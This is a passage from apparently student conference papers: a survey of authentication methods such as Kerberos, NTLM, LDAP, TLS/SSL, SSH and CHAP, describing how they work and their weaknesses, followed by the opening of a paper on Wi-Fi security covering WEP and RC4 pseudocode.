LAN manager, was introduced along with Windows 3.11 in 1992 and it was primarily
used in OS earlier than Windows NT 3.1. NTLMv1 and NTLMv2 were successors of
LAN manager and were released in the later versions of Windows NT. After the
release of Kerberos as open source in 1987, many organizations start to adopt it
including Microsoft. Essentially, Kerberos replaced NTLM as the preferred
authentication in Windows 2000 and beyond.
In 1994, Netscape developed SSL for securing communication sessions and the latest
version of SSL, TLS 1.2 (SSL 3.3), was released in 2008 and then further improved in
2011. In early 1995, University of Technology in Finland was a regular victim of
password attack sniffing. This prompted one of the researchers in the University to
create SSH and SSHv1 to counter that and it was then released to the public as an open
source.
Next, LDAP is another popular application protocol used for communicating recordbased data and maintain distributed directory information services over a network.
LDAP and LDAPv3 came out in 1993 and 1997 respectively. The below diagram
illustrates the timeline of the various authentication methods.
Figure 1: Timeline on Various Authentication Methods
176
3
Authentication Methods Used on Operating Systems
3.1
Passwords
3.1.1 Introduction to Passwords
Passwords are the most basic and widely used form of authentication. In IT,
passwords are commonly used with usernames for better security and accessing
certain things such as accounts and documents. Passwords can be stored both as
plaintext as well as being encrypted by different algorithms and do not necessarily
need to be in the form of words. As passwords rely on secrecy, it is encouraged to
implement encryption for passwords for better security. However, password
authentications are open to several vulnerabilities which can be exploited by methods
such as social engineering, password sniffing, man-in-the-middle attacks, dictionary,
brute force and birthday paradox attack [1].
3.1.2 Passwords from a Historical Perspective
In the context of computing and Information Technology, Massachusetts Institute of
Technology (MIT) created the first ever system with a log-in command that prompts
the user for a password in 1961 [2]. In the past, passwords were stored as plaintext in
a database on the same server. This was the one of the oldest and weakest
authentication method. As passwords were sent in clear text from the clients to the
server, anyone who can intercept this connection would be able to retrieve the exact
password. The one-way hash function was introduced for the better improvement and
security of passwords. However, if someone was able to intercept the hashed
password during authentication, the password can be compromised after it has been
deciphered. Therefore, another improvement was made to add on to password security
which was the use of Challenge-Response passwords [2].
3.2
Public Key Infrastructure (PKI)
3.2.1 Introduction to PKI
Public Key Infrastructure (PKI) is based on a third-party trust system. This third-party
trust system that assures the identity of an individual or other entity is who they claim
they are, is called a Certificate Authority (CA). The non-repudiation evidence is
contained in a digital certificate that has been signed digitally by the CA. Therefore,
two parties that do not have any relationship with one another can then trust the
identity of each other. One example of this kind of certification is to authenticate to a
compute resource whereby a user presents this digital certificate as its non-repudiation
proof instead of using passwords.
A Certificate Policy (CP) assures the communication parties to trust the CA. It also
states policies by stating how the CA establishes identities as well as how it manages
the keys and certificates. The CA generates certificates, publishes them, and publishes
the revocation lists that are utilized as a means to reject compromised keys. The
Current PKI implementation use certificates based on the X.509 V3 standard for
177
interoperability between implementations [3]. PKI supports the use of
public key encryption on an insecure public network such as the Internet to securely
and privately exchange data. It assumes the use of public and
private cryptography key pairs that is obtained and shared through a trusted authority
by authenticating a message sender or encrypting a message [4].
3.2.2 PKI from a Historical Perspective
The use and concepts of Public Key Infrastructure was released in 1969 by Ellis and
British scientist in GCHQ [5]. Whitfield Diffie and Martin Hellman from Stanford
University and Ralph Merkle from the University of California at Berkeley were the
first researchers to uncover and publicly disclose concepts of PKI with Public Key
Cryptography (PKC) in 1976 titled "New Directions in Cryptography".
The Diffie-Hellman-Merkle public and private key exchange algorithm also paved the
way for the implantation for secure public distributions which did not implement
digital signatures. A year later, Ronald L. Rivest, Adi Shamir, and Leonard M.
Adleman, another team of mathematicians from MIT found a way to apply Diffie and
Hellman's theories in the real world context and named their encryption method RSA
by combining the initials of their names. RSA was the basis of using the
multiplication of prime numbers to for a large number that is difficult to reduce.
Therefore, it is harder to crack and exactly fitting the requirement for a practical
public key cryptography implementation [6].
3.2.3 Public Key Cryptography/Public-Key Encryption
Public key cryptography requires extensive knowledge as it is based on extremely
complex mathematical issues and it uses two keys, namely a public and private key.
The private key is used for the encryption and decryption of messages sent between
communicating systems. The public key is used for encryption and verification of
signatures. Public keys are made available to the public and are published in public
directories on the Internet for easy retrieval. This is one of the advantages of public
key cryptography and it also makes key management efforts easier. With the public
key disclosed to the Internet, the integrity of it is critical and is assured by the
completion of certification process by a certification authority (CA). Once the public
key is certified by the CA, the CA will sign the keys digitally and therefore protecting
people from accessing the files as they can trust that it is certified. Both the private
and public keys are created concurrently using the same algorithm by the CA. The
private key is issued to requesting parties and the public key can be accessed from a
public directory for all parties [7]. The private key is never shared or sent to anybody
across the Internet. The private key is used for decrypting texts that have been
encrypted with the receiver's public key. Thus, users can find out a public key from a
central administrator or online public directories and use them to encrypt a message.
Upon the reception of a message, it is decrypted with the receiver's private key. In
178
addition to encrypting messages, the private key ensures non-repudiation by using it
to encrypt a digital certificate. When the message is sent with the encrypted digital
certificate, it can be decrypted with the sender's public key [4]. Here's a table that
restates it:
Task
Use Whose?
Key Used?
Send an unencrypted message
Use the Receiver‟s
Public key
Send an encrypted signature
Use the Sender‟s
Private key
Decrypt an encrypted message
Use the Receiver‟s
Private key
Decrypt an encrypted signature (and
authenticate the sender)
Use the Sender‟s
Public key
3.3
Kerberos
3.3.1 Introduction to Kerberos
Kerberos was developed based on the Needham and Schroeder authentication
protocol and it is a trusted third-party authentication service that provides
authentication on an open network. All of the clients that use Kerberos will trust its
accurate judgment in identifying of each of its other clients and therefore it is trusted.
Timestamps are also added to the existing model by Needham and Schroeder to check
for replay as the message could be stolen from the network and being resent afterward
[8].
3.3.2 Kerberos from a Historical Perspective
Massachusetts's Institute of Technology (MIT) started the development of Kerberos in
the 1983 as part of Project Athena and it had become an IETF standard in 1993. Since
MIT release Kerberos as open source in 1987, many organizations had adopted the
use of it. Kerberos is a popular network authentication protocol that is used by
Microsoft, Apple, Red Hat and Sun and many more [9]. Also, Windows 2000 and
Windows XP uses Kerberos as their authentication method by default because of two
underlying reasons. Kerberos is open source and allow Microsoft to create its own
extensions to Kerberos for Microsoft's applications and Kerberos is reliable for
network authentication [10]. Kerberos authentication replaced NTLM as the preferred
authentication protocol in an active directory based single sign-on scheme for
Windows 2000 and above.
3.3.3 How Kerberos protocol work?
Kerberos holds a database of its clients and their secret keys and the secret keys are
only known to both the Kerberos and the client that the secret key belongs to. If the
client happens to be a user, the secret key would be his encrypted password. Both the
network services and clients have to register with Kerberos before they are able to use
179
its services also the secret key was negotiated during registration. Since Kerberos hold
the secret keys of clients, it can convince one client about the identity of another
client and also Kerberos will create session keys for transmission of messages
between two clients [8]. The below shows the steps on how Kerberos work:
1) Firstly, the client sends a request to the authentication service (AS) which verifies
the client by looking at their database for the client's ID. Next the AS will create a
session key (SK 1) and encrypt it with the client's secret key. Afterward the AS will
create a ticket-granting ticket (TGT) by using the ticket-granting server's (TGS) secret
key.
2) The client will then decrypt the message to get the session key and uses it to create
an authenticator. The client will send both the authenticator and the TGT to the TGS
to request access to the target server. The TGS will decrypt the TGT to obtain a
session key to decrypt the authenticator in order to verify the client. After verification,
the TGS will create a new session key (SK 2) by encrypting it with SK1 along with a
session ticket that is encrypted by the service server's secret key.
3) After that, the client will create an authenticator by using SK2 and send it to the
service server along with the session ticket. For application that require two-way
authentication, the service server will send back a message that is encrypted with SK2
and thus complete the authentication.
4) Lastly, both the client and server will use a symmetric key which they both know
through authentication for transmitting data [11].
3.3.4 Kerberos Weaknesses
Even after several versions of Kerberos have been published Kerberos is still plague
by some weakness.
a) Replay Attacks
In Kerberos Version 4, even with the inclusion of a timestamp in the authenticator and
can be difficult, it is still possible to perform a replay attack. Therefore, the replay
cache was introduced in Kerberos Version 5 with the intention of preventing such
attacks. Authenticator was stored in the servers so the servers would be able to reject
any replicas. However, if the attacker was able to copy the ticket and authenticator
and send them to the application server before the user was able to send his real
request, the attacker would be able to use the service [12].
b) Password Guessing Attacks
This attack is not resolved yet in Kerberos Version 5 [14]. The attacker can intercept
one of the Kerberos tickets; as the ticket is encrypted with a key that is based on the
client‟s password, the attacker may perform a brute force attack to decrypt the ticket.
180
If the attacker is successful in decrypting the ticket, the attacker is able to discover the
client‟s password in the process [13].
c) Single Point of Failure
The Key Distribution Centre (KDC) is required to be available at all times. If the
KDC is down, no one will be able to login or use the services. However, this can be
resolved by having more than one Kerberos server [13].
3.4
NTLM
3.4.1 Introduction to NTLM
NTLM is used in various Microsoft network protocol implementations as a suite of
Microsoft‟s security protocol that provides users with authentication, integrity and
confidentiality. Microsoft's systems uses NTLM as an integrated single sign-on
mechanism by using the credentials obtained during the interactive logon process
which consists of a domain name, a user name, and the hash of user's password [15].
There are two different type of NTLM authentication. One of them is the interactive
NTLM authentication where authentication takes place between the domain controller
and the client where the user has to provide his logon detail during the process. The
other type is the non-interactive NTLM authentication, where the user that is already
logged-on does not have to interactively logon again to gain access to different
resources on the server [16].
3.4.2 NTLM from a Historical Perspective
NTLM is the default authentication protocol used for network authentication for
Windows OS, Windows NT 4.0, and was replaced by Kerberos as the standard in
Windows 2000 [15]. NTLM provides three different challenge-response
authentication methods and their main difference are their levels of encryption.

LAN manager (LM): LM is the first form of secured authentication protocols
and it was introduced along with Windows 3.11 [18]. LM authentication
provides the weakest encryption and it is considered the least secure method
out of the three of them [19].

NTLM Version 1: NTLMv1 replaced LM authentication and it is a more
secure form of authentication as it uses 56-bit encryption and user credentials
stored as NT hashes [19]. NTLMv1 is introduced in Windows NT 3.1 [18].

NTLM Version 2: NTLMv2 was later released to replace NTLMv1 and it
was introduced in Windows NT Service Pack 4. It is the latest version of
NTLM and is currently the most secured challenge-response authentication
as it uses 128-bit encryption [19]. It is currently supported by all versions of
Windows OS from Windows NT SP4 onwards [20]. Windows Vista and
181
newer version of Windows OS uses NTLMv2 as a fallback authentication in
situations where Kerberos cannot be used. The protocol remains to be
supported in Windows 2000 and above even though it is being replaced by
Kerberos as the default [17].
3.4.3 How does NTLM works?
NTLM uses a challenge-response authentication method to allow clients to
authenticate with the server without having to send their password (plaintext) to the
server [14]. NTLM challenge-response mechanism consists of three messages which
are known as negotiation, challenge and authentication.
The following steps illustrate the process of NTLM authentication. As there were two
type of authentication, interactive and non-interactive as part of the NTLM integrated
single sign-on mechanism, only Step 1 will happen in the interactive authentication
process:
1. First a user would enter a domain name, username and password into a client
computer. Afterward, the password of the user would be cryptographic
hashed by the computer and the plaintext password would be disposed of.
2. The client would send the username in plaintext form to the server
3. The server would then generates a 16-bytes random number challenge and
sends it to the client
4. The client would take the challenge and encrypt it with the hash of the user's
password and the client would send the result to the server as a response.
5. The domain controller would receive the username, challenge that is sent to
the client and the response received from the client from the server.
6. The domain controller would then use the username to obtain the hash of the
user's password from the Security Account Manager database and uses it to
encrypt the challenge.
7. Finally, the domain controller would compare the result of encrypted
challenge in Step 6 to the response given by the client. Authentication would
be successful if they are the same [16].
3.5
Lightweight Directory Access Protocol (LDAP)
3.5.1 Introduction to LDAP
LDAP is a popular application protocol used for communicating record-based data
and maintain distributed directory information services over a network. LDAP is
based on a simpler standard than X.500. The directory services provide a set of
records in a hierarchical structure such as Email directory. LDAP is mostly used in
UNIX for authentication and found in many other business environments.
3.5.2 LDAP from a Historical Perspective
182
In early engineering stages, it was known as Lightweight Directory Browsing
Protocol (LDBP) instead. LDAP was created by Tim Howes, Yeong Wengyik and
Steve Kille in 1993. LDAPv3 was published in 1997 by the works of Tim Howes and
Steve Kille. To understand LDAP from a historical perspective, we need to consider
Directory Access Protocol (DAP) and X.500 from which it is derived [21]. In X.500,
the Directory System Agent (DSA) is hierarchical in form and provides efficient and
fast searching and retrieval. The Directory User Agent (DUA) provides functionality
that can be implemented in all sorts of user interfaces through dedicated DUA clients,
email applications or web server gateways [21]. DAP is used in X.500 services for
controlling communications between DSA and DUA agents. LDAP is a subset of
X.500 protocol and its clients are easier to implement and faster than X.500 clients.
Active Directory supports access via LDAP from any LDAP-enabled client and it is
not a pure X.500 directory [21]. Active Directory uses LDAP as the access protocol
and supports the X.500 information model without requiring systems to host the entire
X.500 overhead [21]. By combining LDAP, the best of X.500 naming standards and a
rich set of APIs, Active Directory enables a single point of administration for all
resources [21].
3.5.3 How does LDAP works?
It works in a way that is based on a client/server model. LDAP comes with some
operations such as Bind, Search and Compare, Update Data and etc. LDAP‟s
authentication process is supplied the Bind (authenticate) operation as it establishes
the authentication state for a connection and sets the LDAP protocol version. An
LDAP client must first authenticate itself to the LDAP service by connecting to the
LDAP server known as a DSA on TCP port 389 and sends an operation request to
server. A LDAP client that sends a LDAP request without “Bind” is treated as
anonymous client [22]. The LDAP client must indicate to the LDAP server who is
going to access the data so that the server can decide for the client what can be seen
and do; this is known as access control. The server then responds with the answer or a
pointer to another LDAP server where the client can obtain more information [22].
Clients do not need to wait for a response before sending the next request and in any
order and similarly for the server as well.
3.5.4 Limitations of LDAP
Depending on the versions of Name Service Switch (NSS), Pluggable Authentication
Modules (PAM) and LDAP, Users might not be allowed to change their passwords
[23]. Next, there is a possibility that the system only displays a user ID (UID), this is
because UNIX and Linux clients might not be able to recognize users when they use
commands such as ls or id [23]. Lastly, this may probably be a limitation on desktop
183
environments and is not being able to query LDAP directories correctly. As a result,
users may find that the GUI environments do not work properly as expected.
3.6
Transport Layer Security (TLS) and Secure Sockets Layer (SSL)
3.6.1 Introduction to TLS/SSL
Transport Layer Security (TLS) and Secure Sockets Layer (SSL) are public key
cryptographic protocols developed for securing web browser and communication
sessions. They encrypt network connections by using a message authentication code
keyed beforehand for message reliability and asymmetric cryptography for privacy
reasons. TLS/SSL provides authentication of clients to server through the use of
cryptography and authenticated digital certificates. The specification was designed to
enable other application layer protocols such as LDAP, FTP and TELNET to use SSL
for communications. TLS/SSL ensures strong authentication, message privacy and
integrity to servers and clients. It is mainly used to prevent man-in-the-middle, replay
attacks, masquerade attacks and etc [24]. It is mostly implemented on top of any
Transport Layer protocols.
3.6.2 TLS/SSL from a Historical Perspective
Secure Sockets Layer (SSL) was developed by Netscape in 1994 to secure transactions
over the Internet. In early versions of SSL, SSL Version 1.0 was not released to the
public. On February 1995, SSL Version 2.0 was released with some security flaws
and SSL Version 3.0 came out in 1996 to replace SSL Version 2.0. On January 1999,
TLS 1.0 (SSL 3.1) was released as an upgrade to SSL Version 3.0 and they are not
interoperable. The parties are required to negotiate the same protocol for
communication if the same protocol is not supported by the both of them. On April
2006, TLS 1.1 (SSL 3.2) was released with additional protection against Cipher Block
Chaining (CBC) attacks. On August 2008, TLS 1.2 (SSL 3.3) was released with the
additions of Advanced Encryption Standard Cipher Suites and TLS Extensions
definition. It was further improved in March 2011 on its backward compatibility with
SSL. TLS provides some additional security improvements as compared to SSL such
as Key-Hashing for Message Authentication Code (HMAC), consistent certificate
handling, specific alert messages and etc [25]. Due to the ease of deployment and
usage, it became a popular authentication method used in Windows OS. It works with
most web browsers and OS such as Windows and UNIX as well.
3.6.3 How does TLS/SSL work?
The TLS/SSL protocol can be divided into two different layers. The first layer
consists of the application protocol and Handshake Protocol, the Change Cipher Spec
Protocol, and Alert Protocol. The second layer is the Record Protocol. The record
protocol is responsible for controlling the flow of data between two end points of a
session. Symmetric protocols such as Triple Data Encryption Standard (3DES) are
used for encryption. The handshake protocol authenticates either one or both
endpoints of session then establish a unique symmetric key to generate set of keys for
encryption and decryption of data which is used only for the unique SSL session [25].
184
Once the handshake is completed then the data traversing in application layer will
flow encrypted across the unique SSL session. The digital certificate, issued by a
Certificate Authority (CA) can be assigned to the applications using SSL or either of
the endpoints [25]. I will briefly explain on the steps in SSL handshake:
1.
2.
3.
4.
5.
6.
The browser sends a nonce and requests to secure session from the Web server
Web server sends its own certificate, CA, site information and a public key to
the browser
The browser verifies the certificate and obtains the server‟s public key
The browser sends a pre-master session key encrypted with the server‟s public
key
The server decrypts the pre-master session key using its private key
A secure connection is established after achieving the above steps
3.6.4 Limitations of TLS/SSL
There is a lack of support for UDP traffic in TLS/SSL because it requires a stateful
connection. Also, not all the setups have implemented both the server and client
authentication. Lastly, using of TLS/SSL in tunnel mode can be expensive if the setup
requires an external certification authority to sign those digital certificates [26].
3.7
Secure Shell (SSH)
3.7.1 Introduction to SSH
SSH uses various methods to authenticate remote user that is attempting to connect to
the particular host. SSH works on the application layer of the OSI model. Rather than
transmitting the user password in a plaintext across the SSH channel, the connecting
computer will use the host public key to encrypt the user password to be transmit
much safer as compare to using other application such as, Telnet. SSH utilize the
theory of exchanging of public key during the authentication process to securely
ensure that the password is encrypted, such that, even if a "man-in-the-middle" or
"password-sniffing" manage to get hold of the encrypted text, he/she will not be able
to crack the encrypted text to a plaintext easily without having the private key of the
intended recipient.
3.7.2 SSH from a Historical Perspective
SSH made it first appearance on the market in the year 1995. It was developed by
researcher from University of Technology in Finland. The reason for the need of this
SSH development was that, University of Technology in Finland was a regular victim
of password attack sniffing in the early 1995. As a result, the researcher produces
SSH for the university usage. During the beta phrase of SSH, it has managed to gain
lots of publicity that attracted lots of attention which prompt the research that, it is
possible to make SSH being as a commercial product. On July 1995, SSH-1 was
being release by the researcher and it source code was made available to the public
which allow them to use and edit it freely. At the end of 1995, due to the massive
185
support email that the research received asking for support help, the researcher setup
a company named as "SCS, SSH communication security" to continue its
development on SSH product.
However, numerous problem and limited on SSH1 was discovered as the popularity
of SSH1 skyrocketed. All of these problems and limitation cannot be fixed without
losing its backward compatibility. This triggered the birth of SSH2 in 1996 which
SSH2 uses new algorithm and it is not compatible with SSH1.In February 1997, an
internet draft was submitted for SSH-2 protocol.
In 1998, SSH was released by SCS. However, SSH-2 did not replace SSH1 because
of two reasons. The first reason is because SSH-2 has a shortage of useful and
practical features as compare to SSH-1. Second reason was that SSH-2 was not free to
use except for qualifying educational institute and non-profit organization. Even after
3 years of the release of SSH-2, SSH-2 popularity did not overtake SSH1 at all even
though SSH-2 provides a much better secure protocol [27].
3.7.3 Public key authentication over SSH
This method requires the use of a public key infrastructure technique to authenticate
the user. The authentication process requires the server to have the knowledge
beforehand of the details on the key that the user will like to use. Once the user
decided the public key that he/she will like to use, it will be transmitted to the server
side for it to check whether does the chosen public key is in the permitted list. If not,
the authentication will be deemed as a failed one and the connection will be refused.
Else, the server will use the chosen public key to encrypt a random generated 256-bit
string to send it back to the user as a form of challenge text [28]. Once the user
received the challenge text, the user will decrypt it using its corresponding private
key. The decrypted challenge text is then combine with the session identified and
send to a MD5 function to generate a hash value which must be send back to the
server. If the hash value matches with the hash value which the server had calculated,
then the authentication is a success!
3.7.4 Rhost authentication
This method authenticates the machine rather than the user. User on the client
machine may like to access an account that is available on the server. The SSH client
will first request a connection to the server. The server will then use its DNS to check
on the hostname using the client source IP address. Then, the server authenticates the
machine by using two tests. First test will check to make sure that the client machine
is listed as a trusted machine under the authorization rules, if found, authentication
continue, else aborted and authentication had failed. The second test requires the
server to check the program that is a trusted program installed by the system
administrator of the client machine. The server verifies the second rule by making
sure that the client machine is using the program that uses any privileges port number
186
(1-1023). The client machine can only utilize this range of privilege port with the
superuser account privilege. Hence, this will be able to prove and satisfy the second
rules [28].
Once this two rules has been confirmed as passed, the server will proceed on to verify
that the client have permission to access the particular account that the client user will
like to access on [28].
Out of all the available authentication methods, this method is the weakest one. This
is because this method checked against the client host address [29]. In the modern
network, IP address can be spoofed easily, DNS can be poisoned and users are often
given the superuser privilege which allows them to use any privilege port freely.
3.7.5 Password authentication over SSH
The password method of authenticating over a SSH channel was considered as the last
resort that SSH will use to authenticate users when other authentication methods had
failed [30]. Password authentication is accompanied by using the concept of Public
Key Infrastructure to ensure that the transmitted password is encrypted and safe from
man-in-the-middle attack. The following shows a simple illustration of how the SSH
authentication work over the password model, which Alice is trying to connect to a
server at sunfire.comp.nus.edu.sg.
1. Alice will key in the host address as “sunfire.comp.nus.edu.sg”, port number, her
username and password.
2. „Sunfire.comp.nus.edu.sg‟ will acknowledge the request and send its own public
key to Alice.
3. Alice will look into her list of trusted public key and search for the key of
„sunfire.comp.nus.edu.sg‟.
3a. If the key is not found SSH will prompt Alice on whether she will want to allow
the key from „sunfire.comp.nus.edu.sg‟ to be added to her trusted list.
3b. If a similar public key is found in the trusted list of Alice, it will proceed on to
Step 4.
4. Alice will use that public key from Sunfire to encrypt all her authentication details
that includes the username and password. At the same time, Alice computer will send
her a copy of the public key to Sunfire host.
5. Once Sunfire receive the encrypted authenticaton details and Alice‟s public key,
Sunfire will decrypt the authentication details by using it own private key and proceed
to do the username and password authentication against their own database.
3.7.6 Host-Based authentication over SSH-2
187
In the SSH-2 protocol, it removed the authentication of SSH-1 Rhost method due to
insecurity. However, SSH-2 embedded with another authentication method that is
known as “host-based” authentication [30]. Host-based authentication required the
client hostname instead of client IP address. This helps to eliminate the issue on client
with a dynamic IP address, client behind a proxy, and client with more than one IP
address. The authentication process required two identifiers, Nnet and Nauth. Nnet
refers to the client name in the authentication request and Nauth refers to the name to
look up through the client‟s network address. If both of these identifiers value are not
the same, then the authentication process will be a failure [30].
3.8
Challenge Handshake Authentication Protocol (CHAP)
3.8.1 Introduction to CHAP
Challenge Handshake Authentication Protocol (CHAP) challenge-response is a threeway handshake authentication protocol used periodically to ensure the identity of a
peer is valid [31]. It uses the hashing scheme of Message Digest 5(MD5) to encrypt
the responses and it is also used by various network access servers and client vendors.
Remote access clients that use CHAP are authenticated by any server with Routing
and Remote Access supports CHAP and this is because CHAP uses the reversibly
encrypted password [32].
CHAP Challenge and Response Process [31]:
1.
The authenticator sends a “challenge” message to a peer after a link has been
established.
2.
A “one-way hash” function is used to calculate a value before being sent
back to the authenticator by the peer
3.
The value received is compared with the authenticator‟s own calculation of
the expected has value and an authenticated is acknowledged if the values
match. Otherwise, the connection should be terminated.
4.
The authenticator periodically sends a new challenge to the peer at random
intervals and the repetition of Steps 1 to 3 is done for every challenge.
3.8.2 CHAP from a Historical Perspective
The development of CHAP was assumed in 1996 as defined in RFC-1994[33].
Microsoft's rendition of MS-CHAPv1 and MS-CHAPv2 are also assumed to be
released on 1998(RFC-2433) [34] and 2000(RFC-2759) [35] respectively. Microsoft's
versions were extensions and improvements to the original CHAP. Microsoft
Challenge Handshake Authentication Protocol Version 1 is an encrypted password
authentication protocol that is not reversible [36]. Microsoft Challenge Handshake
Authentication Protocol Version 2 provides remote access connections stronger
188
security as compared to MS-CHAP version 1[37]. A general description of the
differences and processes between MS-CHAPv1 and MS-CHAPv2 [38] are shown
below:
MS-CHAP Version 1
MS-CHAP Version 2
Begins CHAP with the value of 0x80
algorithm
Begins CHAP with the value of 0x81
algorithm
An 8-byte challenge is sent by the
Server.
A 16-byte challenge is sent by the client
is used to create the 8-byte challenge
value by the Server.
A 24-btye LANMAN and NT response is
sent by the client in response to the 8byte challenge.
A same 16-btye peer challenge response
used by the client to create the hidden 8byte challenge is sent together with the
24-byte NT response.
A SUCCESS or FAILURE response is
sent by the Server
A SUCCESS or FAILURE response is
sent by the server and it piggybacks an
Authenticator Response to the 16-byte
peer challenge.
Based on the SUCCESS or FAILURE
response above, the client then decides
whether to continue with the connection.
Based on the SUCCESS or FAILURE
response above, the client then decides
whether to continue with the connection.
Additionally, if the expected value of the
Authenticator Response is not valid when
the client checks it, the connection is then
disconnected.
4
Conclusions
In conclusion, authentication methods are needed everywhere in our daily lives for
authenticating different users and systems. The above authentication methods we have
explored are ubiquitously available even till today. So far, we have seen the evolution
of authentication methods over the years in terms of improvements on authenticating
different users and systems. Now, we have reached an age of exponentially increasing
services and processes are also getting more complex. Therefore, it is essential to use
new set of sophisticated algorithms to implement newer authentication methods and
security measures to safeguard against unauthorized access and potential attacks. It is
important to ensure that sensitive data are not lost and visible to unauthorized people
and trustworthiness of data is maintained while implementing newer authentication
methods.
189
References
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
About Passwords,
http://media.techtarget.com/searchSecurity/downloads/HackingforDummiesCh
07.pdf
The History of Passwords, http://www.onlinepasswordgenerator.net/thehistory-of-passwords.php
Introduction and Background of PKI, http://www.pdfsearchbox.com/TheAlliance-PKI-Initiative.html
Public Key Infrastructure Details,
http://searchsecurity.techtarget.com/definition/PKI
History of PKI, www.saylor.org/site/wp-content/.../03/Public-keyinfrastructure.pdf
Public Key Cryptography (PKC) History,
http://www.livinginternet.com/i/is_crypt_pkc_inv.htm
SANS Information on Authentication,
http://www.sans.org/reading_room/whitepapers/authentication/overviewauthentication-methods-protocols_118
Kerberos Overview, Authentication Service for Open Network Systems,
http://www.cisco.com/en/US/tech/tk59/technologies_white_paper09186a0080
0941b2.shtml
Frequently Asked Questions about the MIT Kerberos Consortium,
http://www.kerberos.org/about/FAQ.html
Kerberos Authentication History,
http://www.theworldjournal.com/special/nettech/news/kerberos.htm
Sharing a Secret: How Kerberos Works,
http://www.computerworld.com/computerworld/records/images/pdf/kerberos_
chart.pdf
Kerberos Authentication Protocol,
http://www.zeroshell.net/eng/kerberos/Kerberos-definitions/#1.3.8
Risk Assessment of Authentication Protocol: Kerberos,
http://www.scribd.com/doc/59497058/Risk-Assessment-of-AuthenticationProtocol-Kerberos
Protect Yourself against Kerberos Attacks,
http://oreilly.com/pub/a/windows/excerpt/swarrior_ch14/index1.html
The NTLM Authentication Protocol and Security Support Provider,
http://davenport.sourceforge.net/ntlm.html
Microsoft NTLM, http://msdn.microsoft.com/enus/library/aa378749%28VS.85%29.aspx
190
17.
18.
34.
NTLM, http://www.webopedia.com/TERM/N/NTLM.html
Protect against Weak Authentication Protocols and Passwords,
http://www.windowsecurity.com/articles/Protect-Weak-AuthenticationProtocols-Passwords.html
Authentication Types, http://www.tech-faq.com/authentication-types.html
Understanding NTLM, http://cybernicsecurity.com/index.php/authentication/4-understanding-ntlmWindows Server TechCenter, http://technet.microsoft.com/enus/library/cc784450(WS.10).aspx
ISeries Information Center V5R3,
http://publib.boulder.ibm.com/infocenter/iseries/v5r3/index.jsp?topic=%2Frzai
n%2Frzainhistory.htm
Limitations and Differences between TLS/SSL as VPN Solution,
http://olemartin.com/projects/VPNsolutions.pdf
Managing Identity Information between LDAP Directories and Exchange
Server 2010, http://allcomputers.us/windows_server/managing-identityinformation-between-ldap-directories-and-exchange-server-2010.aspx
Authentication Using LDAP, http://tldp.org/HOWTO/LDAPHOWTO/authentication.html
Windows IT Pro, LDAP Limitations,
http://www.windowsitpro.com/article/ldap/ldap-limitations
O‟Reilly Definitive Guide on History of SSH,
http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch01_05.htm
O‟Reilly Definitive Guide on SSH-1,
http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_04.htm
O‟Reilly Definitive Guide on SSH-2,
http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_05.htm#ch03-80181
Type of SSH Authentication,
http://www.psc.edu/general/net/ssh/authentication.php
Challenge Handshake Authentication Protocol for PPP,
http://www.javvin.com/protocolCHAP.html
Microsoft TechNet: Windows Server TechCenter Library,
http://technet.microsoft.com/en-us/library/cc757631(WS.10).aspx
PPP Challenge Handshake Authentication Protocol,
http://tools.ietf.org/html/rfc1994
MS PPP CHAP Version 1 History, http://tools.ietf.org/html/rfc2433
35.
MS PPP CHAP Version 2 History, http://tools.ietf.org/html/rfc2759
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
191
36.
Microsoft TechNet, MS-CHAPv1 Definition,
http://technet.microsoft.com/en-us/library/cc758984(WS.10).aspx
37.
Microsoft TechNet, MS-CHAPv2 Definition,
http://technet.microsoft.com/en-us/library/cc739678(WS.10).aspx
38.
Cryptanalysis of Microsoft's PPTP Authentication Extensions (MSCHAPv2), http://www.schneier.com/paper-pptpv2.html
192
Different strategies used for securing IEEE 802.11 systems;
the strengths and the weaknesses.
Cheng Chang, Yu Gao
National University of Singapore
Abstract. Abstract: Different wireless security protocols are used to establish a
secured wireless networks over time. With the understanding the underlying
mechanism of each protocol, cross compare these protocols with each other
to reach a final evaluation of each individual protocol. In this way, both
strength and weakness can be shown clearly. Apparently, according to the
history of these protocols, some of the protocols are modifications of the
previous ones and some of them use completely new ideas to achieve a new
standard of security. In the following paper, all the above information will be
discussed in details.
Keywords: wireless, security, WEP, WPA
1
Introduction
The invention of wireless makes it possible for remote users to access the
internet everywhere. It causes a dramatic shift in the development of laptop
due to the convenience of accessing the internet. However, the chance of
being interrupted whiling surfing on the internet is much higher than that of
a wired connection. Thus, the need of a new secured network protocol is
essentially necessary. In the following paper, all these protocols with
respective underlying mechanisms that help to make the connection more
secured will be discussed in details. At the same time, the strength and
weakness will be evaluated through the comparisons between different
protocols based on the underlying structures, techniques and methodologies
that an individual protocol uses.
2
Wired Equivalent Privacy (WEP)
Since the invention of the IEEE 802.11 in 1985, the wireless networks are not
secured until the first reliable securing method is developed in 1999. This is
193
the Wired Equivalent Privacy. The intention of this WEP algorithm is to
provide confidentiality and integrity to the unsecured wireless networks.
2.1
Algorithm Details:
Confidentiality:
Stream cipher RC4, which is a stream cipher that is widely used in many
popular protocols such as Secure Sockets Layer (SSL) and WEP
Mechanism behind RC4:
Step 1: use key scheduling algorithm (KSA) to generate a key, which shall be
between 40 to 256 bits. [1]The algorithm is as follows:
for i from 0 to 255
S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor
Step2: pseudo-random generation algorithm (PRGA). While there are still
necessary iterations, the PRGA will output a byte of the key stream by
updating the state. For each iteration, the PRGA increments “i” and adds the
value in S[i] to j. After swapping the values of S[i] and S[j], output the final
result S[i] + S[j] modulo 256. [2]
The algorithm is as follows:
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
K := S[(S[i] + S[j]) mod 256]
194
output K
endwhile
Integrity:
Cyclic redundancy check (CRC) is an error-detecting code designed to detect
accidental changes to raw computer data, and is commonly used in digital
networks and storage devices such as hard disk drives. [3]
Mechanism behind CRC-32 checksum:
The data are checked with a fix length depending on the length of the divisor
that is selected. Append a number of bits that is one bit less than the length
of the divisor to the original data. With the left most 1 as the start point,
